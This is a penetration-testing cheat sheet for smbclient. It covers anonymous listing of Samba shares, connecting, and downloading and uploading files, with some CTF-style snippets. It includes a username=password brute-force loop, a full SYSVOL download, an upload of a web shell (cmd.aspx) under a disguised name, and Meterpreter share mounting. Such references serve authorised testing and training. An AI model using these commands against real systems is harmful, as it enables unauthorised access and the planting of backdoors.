smbclient

Interact with Samba shares

Help

smbclient --help

List Samba shares

No password

💡 Try this first!

smbclient -N -L $IP -U ""

Prompt for password

smbclient -L $IP -U ""

With password

smbclient -L $IP -U "${DOMAIN}/${USER}%${PASS}"

Bruteforce username=password

for USER in $(cat users.txt); do echo $USER; smbclient -U ${DOMAIN}/${USER}%${USER} -L $IP; done

Connect to Samba share

smbclient \\\\${IP}\\SHARENAME

smbclient \\\\${IP}\\SHARENAME -U "${DOMAIN}/${USER}%${PASS}"

No password

smbclient -N \\\\x.x.x.x\\SHARENAME

Execute commands

smbclient -N \\\\x.x.x.x\\SHARENAME -c 'cd somedir ; dir'

List available commands

help

help <command>

List files

dir

Read files

more <filename>

Download files

mget <filename>

💡 Use the prompt command before mget to remove the prompt “Get file <filename>?”

prompt
mget *

Download ALL files

Will give errors for directories that are not accessible (access denied), but still works 😉

smbclient \\\\${IP}\\SYSVOL -U "${DOMAIN}/${USER}%${PASS}" -Tc allfiles.tar /

tar xvf allfiles.tar

Upload files

If getting “NT_STATUS_ACCESS_DENIED opening remote file”, it means that the share is read-only 🙁

put <local name> [remote name]

put /usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx somefile.aspx

smbclient //server/share -c 'cd c:/remote/path ; put local-file remote-file'

local-file - file from local machine

remote-file - copy to this file on remote machine

Other commands

No password

smbclient -L $IP -U "" -N

# List Samba Shares
/usr/bin/smbclient -L
Enter elf's password: elf

# Samba configs
cd /var/lib/samba/usershares
cd /etc/samba

# Samba log file 
cd /var/log/samba

# Find valid users that can connect to Samba shares 
grep "valid users" /etc/samba/smb.conf

# Connect to Samba share and upload file
# Connect to samba share with user "report-upload"
/usr/bin/smbclient //localhost/report-upload/ "directreindeerflatterystable" -U report-upload

# Upload /home/elf/report.txt to //localhost/report-upload/ samba share
put report.txt

#-------------------------------------------------------------------------------
# 
#-------------------------------------------------------------------------------
To use the client, run:

    /usr/bin/smbclient service <password>
where 'service' is a machine and share name. For example, if you are trying to reach a directory that has been shared as 'public' on a machine called zimmerman, the service would be called \\zimmerman\public. However, due to shell restrictions, you will need to escape the backslashes, so you end up with something like this:

/usr/bin/smbclient \\\\zimmerman\\public mypasswd -U username

/usr/bin/smbclient //localhost/report-upload/ report-upload -U report-upload

# No password
/usr/bin/smbclient //localhost/report-upload/ "" -U report-upload
Anonymous login successful

/usr/bin/smbclient //localhost/report-upload/ "" -U guest

#-------------------------------------------------------------------------------
# For each system, list open SMB shares
#-------------------------------------------------------------------------------
smbmap -u $USER -p $PASSWORD -d $DOMAIN -H X.X.X.X
smbclient -L $SHARE -U $USERNAME -W $DOMAIN

# Use Meterpreter's shell access to mount shares
meterpreter> shell
c:\> net use * \\X.X.X.X\$SHARENAME

######
Assuming you have gained access to a credential, one of the additional nice things you can do is explore the SYSVOL using the “smbclient” program.   The syntax is as follows.

smbclient -U "jdoe%bbb" \\\\domain.corp\\SYSVOL

smbclient -W 'WORKGROUP' //'x.x.x.x'/ipc$ -U''%'' -c 'help' 2>&1

Connect anonymously to share

smbclient \\\\x.x.x.x\\sharename -U ""%""
ls